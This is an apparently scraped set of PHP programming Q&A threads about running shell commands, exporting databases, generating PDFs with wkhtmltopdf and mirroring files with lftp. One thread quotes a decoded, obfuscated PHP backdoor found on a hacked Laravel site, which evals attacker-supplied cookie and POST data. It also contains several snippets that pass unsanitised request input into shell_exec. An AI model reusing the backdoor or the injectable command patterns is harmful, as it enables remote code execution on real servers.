I am successfully starting and running concurrent PHP-Processes with:
$WshShell = new COM('WScript.Shell');
foreach(array('foo', 'bar', ...) as $i) {
$oExec = $WshShell->Run('C:\\wamp\\bin\\php\\php' . phpversion() . '\\php.exe ' .
'-c C:\\wamp\\bin\\apache\\Apache2.2.21\\bin ' . // Use correct php.ini!
'-f C:\\Users\\Max\\Project\\start.php "' . $i . '" ' . 0, false);
}
}
I am wondering how many PHP-Processes I can run at the same Time (in a usual Windows and Linux Environment)?
Related
I am working on database migration. I have written a code for executing the command that retrieves the data from database and pushes into a csv file. This Works fine in MySQL but when I try to do the same in SQL Server it does not work. Infact when I copy paste the same command into command prompt it works fine. I double checked everything. I do not understand why its not working. It returns blank output. I have already tried many of the solutions provided before. None works. Any help on this is most appreciated.
Here is the code I am using:
//$sqlsrv is used to determine the database server type
$str_query = voc_get_query_string($query);
$output_uri = 'temporary://' . user_password();
$file_path = drupal_realpath($output_uri . '.csv');
if($sqlsrv){
$exec_path = drupal_realpath('private://Binn\sqlcmd');
}else{
$exec_path = drupal_realpath('private://mysql');
}
$sql_uri = 'temporary://' . user_password();
$sql_path = drupal_realpath($sql_uri);
$fp = fopen($sql_path, 'w');
fputs($fp, $str_query);
fclose($fp);
global $databases;
if ($sqlsrv) {
$cmd = ($exec_path .
' -S ' . $databases['default']['default']['host'] .
' -d ' . $databases['default']['default']['database'] .
' -U ' . $databases['default']['default']['username'] .
' -P ' . $databases['default']['default']['password'] .
' -i ' . $sql_path . '>>'. $file_path .
' -s '. '"," -W -m10 -r1');
}
else {
$cmd = ($exec_path . ' ' . $databases['default']['default']
['database'] .
' -h ' . $databases['default']['default']['host'] .
' -u ' . $databases['default']['default']['username'] .
' -p ' . $databases['default']['default']['password'] . ' < '
. $sql_path .
' > ' . $file_path);
}
exec($cmd);
watchdog('cmd', var_export($cmd, TRUE));
For a customer I am maintaining a small group of websites built in PHP Laravel. Lately while working on these I have discovered a couple of new suspicious looking files, which suddenly appeared on two of the websites FTP servers. The files are not originally a part of the codebase, and I have no idea where they're coming from all of a sudden. There are three files in total, named b3lo5x3x.php, cache.php and plugin.php and they are located in the root directory of the websites.
The content of the files looks pretty disturbing. When decoded on unphp.net I get the following result, which is the exact same for all three files. The size of all three files are also the same.
<?php
$hguenpg = '8v7n\'kadeH62ycg_ti9pm1-fsb0#rxlu4*o';
$fvgiv = Array();
$fvgiv[] = $hguenpg[18] . $hguenpg[11] . $hguenpg[0] . $hguenpg[0] . $hguenpg[26] . $hguenpg[11] . $hguenpg[21] . $hguenpg[0] . $hguenpg[22] . $hguenpg[10] . $hguenpg[7] . $hguenpg[13] . $hguenpg[11] . $hguenpg[22] . $hguenpg[32] . $hguenpg[6] . $hguenpg[23] . $hguenpg[8] . $hguenpg[22] . $hguenpg[0] . $hguenpg[32] . $hguenpg[6] . $hguenpg[25] . $hguenpg[22] . $hguenpg[13] . $hguenpg[32] . $hguenpg[7] . $hguenpg[21] . $hguenpg[18] . $hguenpg[11] . $hguenpg[25] . $hguenpg[2] . $hguenpg[7] . $hguenpg[0] . $hguenpg[23] . $hguenpg[2];
$fvgiv[] = $hguenpg[9] . $hguenpg[33];
$fvgiv[] = $hguenpg[27];
$fvgiv[] = $hguenpg[13] . $hguenpg[34] . $hguenpg[31] . $hguenpg[3] . $hguenpg[16];
$fvgiv[] = $hguenpg[24] . $hguenpg[16] . $hguenpg[28] . $hguenpg[15] . $hguenpg[28] . $hguenpg[8] . $hguenpg[19] . $hguenpg[8] . $hguenpg[6] . $hguenpg[16];
$fvgiv[] = $hguenpg[8] . $hguenpg[29] . $hguenpg[19] . $hguenpg[30] . $hguenpg[34] . $hguenpg[7] . $hguenpg[8];
$fvgiv[] = $hguenpg[24] . $hguenpg[31] . $hguenpg[25] . $hguenpg[24] . $hguenpg[16] . $hguenpg[28];
$fvgiv[] = $hguenpg[6] . $hguenpg[28] . $hguenpg[28] . $hguenpg[6] . $hguenpg[12] . $hguenpg[15] . $hguenpg[20] . $hguenpg[8] . $hguenpg[28] . $hguenpg[14] . $hguenpg[8];
$fvgiv[] = $hguenpg[24] . $hguenpg[16] . $hguenpg[28] . $hguenpg[30] . $hguenpg[8] . $hguenpg[3];
$fvgiv[] = $hguenpg[19] . $hguenpg[6] . $hguenpg[13] . $hguenpg[5];
foreach ($fvgiv[7]($_COOKIE, $_POST) as $lfpfzw => $wqudv) {
function dgubnv($fvgiv, $lfpfzw, $nclll) {
return $fvgiv[6]($fvgiv[4]($lfpfzw . $fvgiv[0], ($nclll / $fvgiv[8]($lfpfzw)) + 1), 0, $nclll);
}
function oocfo($fvgiv, $elasr) {
return #$fvgiv[9]($fvgiv[1], $elasr);
}
function yiugt($fvgiv, $elasr) {
$vezpr = $fvgiv[3]($elasr) % 3;
if (!$vezpr) {
eval($elasr[1]($elasr[2]));
exit();
}
}
$wqudv = oocfo($fvgiv, $wqudv);
yiugt($fvgiv, $fvgiv[5]($fvgiv[2], $wqudv ^ dgubnv($fvgiv, $lfpfzw, $fvgiv[8]($wqudv))));
} ?>
Does anyone know what this can be? Can it be that the FTP servers are infected with some kind of malware or hacking tools?
Wipe the machines affected completely. You need to reinstall the Laravel project(s) to a new clean machine. You also should audit them and any other software used if possible.
Make sure that all of the software on the server is updated too. Most likely you were compromised through a non updated software with a known vulnerability.
Here is a sample of my script
$clientid = $_POST['clientid'];
$from_day = $_POST['stat_from_day'];
$from_month = $_POST['stat_from_month'];
$from_year = $_POST['stat_from_year'];
$to_day = $_POST['stat_to_day'];
$to_month = $_POST['stat_to_month'];
$to_year = $_POST['stat_to_year'];
$from_date_string = $from_day . ' ' . $from_month . ' ' . $from_year ;
$to_date_string = $to_day . ' ' . $to_month . ' ' . $to_year ;
$baseurl = "http://www.test.com/";
$part1 = "?Search=" . $clientid . " from_day=" . $from_day . " from_month=" . $from_month . " from_year=" . $from_year ;
$part2 = " to_day=" . $to_day . " to_month=" . $to_month . " to_year=" . $to_year ;
$time = mktime();
$formatted_time = date("d_M_Y", $time);
$command = "xvfb-run -a /usr/bin/wkhtmltopdf --ignore-load-errors";
$url = $baseurl . $part1 . $part2 ;
$html = file_get_contents($url);
$output_dir = '/var/www/stats/pdf/';
$output = $clientid . '_Search_Export_' . $formatted_time . rand(10000, 99999) . '.pdf';
$generate = shell_exec($command . ' ' . $url . ' ' . $output_dir . $output) ;
The problem i seem to be having is with the $command, basically when it runs wkHTMLtoPDF it runs it via a Command Line, and &variable= bit causes the script to error as via command line & is another command, my question is how do i get the variables to be passed correctly so that the script this then sends to, will be able to use $_GET variables that i require for the script to then work ?
I have done a bit of looking up and found something along the lines of using $argv1;
Replacing $_GET to make it work from command line
However i cannot seem to find a reference that closely matches my needs.
Change this:
$url = $baseurl . $part1 . $part2 ;
To this:
$url = "\" . $baseurl . $part1 . $part2 . "\";
Actually wkhtmltopdf accepts and passes POST data to the server-side page being printed/exported to pdf.
All you need is --post fieldName value.
xvfb-run -a /usr/bin/wkhtmltopdf --ignore-load-errors --post username blablabla --post bla2 answer2
You can have as many as that in the command to pass as many post parameters as you want
I'm experiencing a very strange problem with my PHP script "hanging" even after the background processes have finished running. I am running PHP 5.3, Windows Server 2008 R2, IIS7 with Tomcat Apache installed.
Project Background My script generates PDF forms through the "shell_exec()" function. Anywhere between 1 - 3,000 forms can be generated. Once all forms have been generated, a download link and "start over" link are supposed to show at the bottom of the page -- instead, the site continues to "load" and the links never show up -- even when I check the server and see that all files have finished generating.
This issue only comes up when generating 300+ forms, which takes 3-6mins.
I have set my php.ini's "max_execution_time" to 1200 (20mins), and IIS7's "Connection Timeout" is also set to 1200 seconds. Here are links to pictures of these settings to confirm I have them set properly:
http://i49.tinypic.com/15gavew.png -- php.ini
http://i49.tinypic.com/9u5j0n.png -- IIS7
Is there another setting that I am missing? Is there a Tomcat Apache Connection Timeout setting that I am unaware of? Does PHP have another "timeout" setting besides "max_execution_time" and "set_time_out"? I've exhausted my resources and have not a clue as to why my script continues to hang, even after the "while loop" has finished running and all PDFs have been successfully created.
Thank you for any and all help/advice.
While Loop Code
/* build zip & directory for PDFs */
$zip = new ZipArchive;
$time = microtime(true);
$new_dir = "c:/pdfgenerator/f-$time";
if(!file_exists($new_dir)) {
mkdir($new_dir);
}
$res = $zip->open("pdf/tmppdf/mf-pdfs_" . $time . ".zip", ZipArchive::CREATE);
$num = 0;
while($row = mysql_fetch_array($result)) {
/* associate a random # assigned to each PDF file name */
$num++;
include($form);
$rand = rand(1,50000);
$file_num = $num * $rand;
$fo = fopen('c:\\pdfgenerator\\f-' . $time . '\\mf_pdf-' . $time . '-' . $file_num . '.html', 'w') or die("can't open file");
fwrite($fo, $output);
echo shell_exec('c:\wkhtmltopdf\wkhtmltoimage c:\\pdfgenerator\\f-' . $time . '\\mf_pdf-' . $time . '-' . $file_num . '.html c:\\pdfgenerator\\f-' . $time . '\\mf_pdf-' . $time . '-' . $file_num . '.jpeg');
/* the follow uses ghost script to execute the ImageMagick convert command from cmd.exe */
$magick_dir = 'C:\imagemagick'; // install IM in short DOS 8.3 compatible path
$send_cmd=$magick_dir .'\convert c:\\pdfgenerator\\f-' . $time . '\\mf_pdf-' . $time . '-' . $file_num . '.jpeg -resize "1710x2200^!" c:\\pdfgenerator\\f-' . $time . '\\mf_pdf-' . $time . '-' . $file_num . '.jpeg' ;
echo shell_exec($send_cmd);
$send_cmd=$magick_dir .'\convert c:\\pdfgenerator\\f-' . $time . '\\mf_pdf-' . $time . '-' . $file_num . '.jpeg c:\\pdfgenerator\\f-' . $time . '\\mf_pdf-' . $time . '-' . $file_num . '.pdf';
echo shell_exec($send_cmd);
/* EO ghostscript code */
/* add the newly generated files to the Zip Archive */
if ($res === TRUE) {
//echo "RESULT TRUE...";
$zip->addFile('c:/pdfgenerator/f-' . $time . '/mf_pdf-' . $time . '-' . $file_num . '.pdf','c:/pdfgenerator/f-' . $time . '/mf_pdf-' . $time . '-' . $file_num . '.pdf');
//echo "FILE ADDED!";
}
}
echo "<h2>Download Zip</h2>";
echo "<h2>Start Over</h2>";
$zip->close("pdf/tmppdf/mf-pdfs_" . $time . ".zip", ZipArchive::close());
}
}
Specific Shell Lines
echo shell_exec('c:\wkhtmltopdf\wkhtmltoimage c:\\pdfgenerator\\f-' . $time . '\\mf_pdf-' . $time . '-' . $file_num . '.html c:\\pdfgenerator\\f-' . $time . '\\mf_pdf-' . $time . '-' . $file_num . '.jpeg');
/* the follow uses ghost script to execute the ImageMagick convert command from cmd.exe */
$magick_dir = 'C:\imagemagick'; // install IM in short DOS 8.3 compatible path
$send_cmd=$magick_dir .'\convert c:\\pdfgenerator\\f-' . $time . '\\mf_pdf-' . $time . '-' . $file_num . '.jpeg -resize "1710x2200^!" c:\\pdfgenerator\\f-' . $time . '\\mf_pdf-' . $time . '-' . $file_num . '.jpeg' ;
echo shell_exec($send_cmd);
$send_cmd=$magick_dir .'\convert c:\\pdfgenerator\\f-' . $time . '\\mf_pdf-' . $time . '-' . $file_num . '.jpeg c:\\pdfgenerator\\f-' . $time . '\\mf_pdf-' . $time . '-' . $file_num . '.pdf';
echo shell_exec($send_cmd);
converted all of my mysql_ functions, which are now deprecaded as of PHP 5.5, and utilized MySQLi functions.
I'm using a Linux local computer and need to backup/mirror some very large file structures regularly. I only have access to SFTP.
I was after a simple one click solution. I originally tried to write the little script in BASH but I've never used it before and am not up to scratch with the syntax so I resorted to PHP. (I do understand PHP is not designed for this kind of work, but I'm on a tight time scale and don't have the time to get into BASH atm)
<?php
//init
parse_str(implode('&', array_slice($argv, 1)), $_GET);
$error = array();
$lPrefix = '/home/hozza/Sites/';
$archiveLocation = '/home/hozza/Backups/';
$lDir = isset($_GET['l']) ? $_GET['l'] : $error[] = 'Local Directory Required';
$rDir = isset($_GET['r']) ? $_GET['r'] : $error[] = 'Remote Directory Required';
$bookmark = isset($_GET['b']) ? $_GET['b'] : $error[] = 'lftp Bookmark Required';
//Check for args
if(count($error) == 0) {
$archiveName = end(explode('/', $lDir)) . '_' . date('Y-m-d_H-i');
//Validate local dir
if(is_dir($lPrefix . $lDir)) {
//preserve Sublime Text 2 config SFTP files
$ST2_SFTP_conf = false;
if(file_exists($lPrefix . $lDir . '/sftp-config.json')) {
$ST2_SFTP_conf = file_get_contents($lPrefix . $lDir . '/sftp-config.json');
unlink($lPrefix . $lDir . '/sftp-config.json');
}
//Start mirror
$lftOutput = explode("\n", shell_exec('lftp -e "mirror -e -p --parallel=10 --log=' . $archiveLocation . 'logs/' . $archiveName . '.txt ' . $rDir . '/ ' . $lPrefix . $lDir . '/; exit top" ' . $bookmark));
//Tar regardless of lftp error or success
$tarOutput = shell_exec('cd ' . $lPrefix . ' && tar -czf ' . $archiveLocation . $archiveName . '.tar.gz ' . $lDir);
//Output completion or errors
shell_exec('notify-send -i gnome-network-properties -t 0 "Mirror & Archive Complete" "' . $archiveName . '\n\n' . implode('\n', $lftOutput) . $tarOutput . '"');
//put back ST2 SFTP conf
if($ST2_SFTP_conf != false) file_put_contents($lPrefix . $lDir . '/sftp-config.json', $ST2_SFTP_conf);
exit;
}
else shell_exec('notify-send -i error -t 0 "Mirror & Archive Error" "' . date('Y-m-d') . ' ' . date('H-i') . '\n' . $lDir . ' \n Does not exist! D:"');
}
else shell_exec('notify-send -i error -t 0 "Mirror & Archive Error" "' . date('Y-m-d') . ' ' . date('H-i') . '\n' . implode('\n', $error) . '"');
?>
It can be run for many sites via a short-cut like so...
terminator -T "Mirror & Archive" -e "php ~/Programs/mirror.php l=local-dir_path r=./ b=lftp-bookmark-name"
If no password is in the LFTP bookmark (there shouldn’t be as it's stored in plain text) the terminal prompts for a password, after the script has run, a nice notification is given with some info about files/folders/speed etc.
However, when the script is running in a terminal, only the "input password" bit is output to the terminal, I would like all the output displayed in the terminal (normally that would display what file/folder is currently working with etc.)
Anyone know how to do that?
IIRC the reason that you see the password prompt output to the terminal is that it is using stderr. You could try redirecting stdout to stderr for your commands which should show you the 'real-time' progress. Tack this on to the end of the shell_exec() command: 1>&2
ie:
shell_exec('lftp -e "mirror -e -p --parallel=10 --log=' . $archiveLocation . 'logs/' . $archiveName . '.txt ' . $rDir . '/ ' . $lPrefix . $lDir . '/; exit top" ' . $bookmark . ' 1>&2')
However, this will preclude you from having anything returned by shell_exec for logging purposes. What I would suggest is something like:
$log_stem = '/tmp/' . time() . '_'; // ie: /tmp/1357581737_
$lfOutfile = $log_stem . 'lftp.log';
$tarOutfile = $log_stem . 'tar.log';
shell_exec('lftp -blah | tee ' . $lfOutfile ' 1>&2' );
shell_exec('tar -blah | tee ' . $tarOutfile ' 1>&2' );
$lfOut = file_get_contents($lfOutfile);
$tarOut = file_get_contetns(tarOutfile);
// remove tmp files
unlink($lfOutfile);
unlink($tarOutfile);
Which will capture a copy of the output to a file before redirecting the output to stderr so you can watch it live.
However, if you want to run this via cron I would recommend against writing anything to stderr that is not an error, otherwise cron will send a warning email every time it is run.
I think the last answer was close:
Either this:
shell_exec('lftp -blah |& tee ' . $lfOutfile );
shell_exec('tar -blah |& tee ' . $tarOutfile );
Or if that still doesn't work try this:
shell_exec('lftp -blah 2>&1 | tee ' . $lfOutfile );
shell_exec('tar -blah 2>&1 | tee ' . $tarOutfile );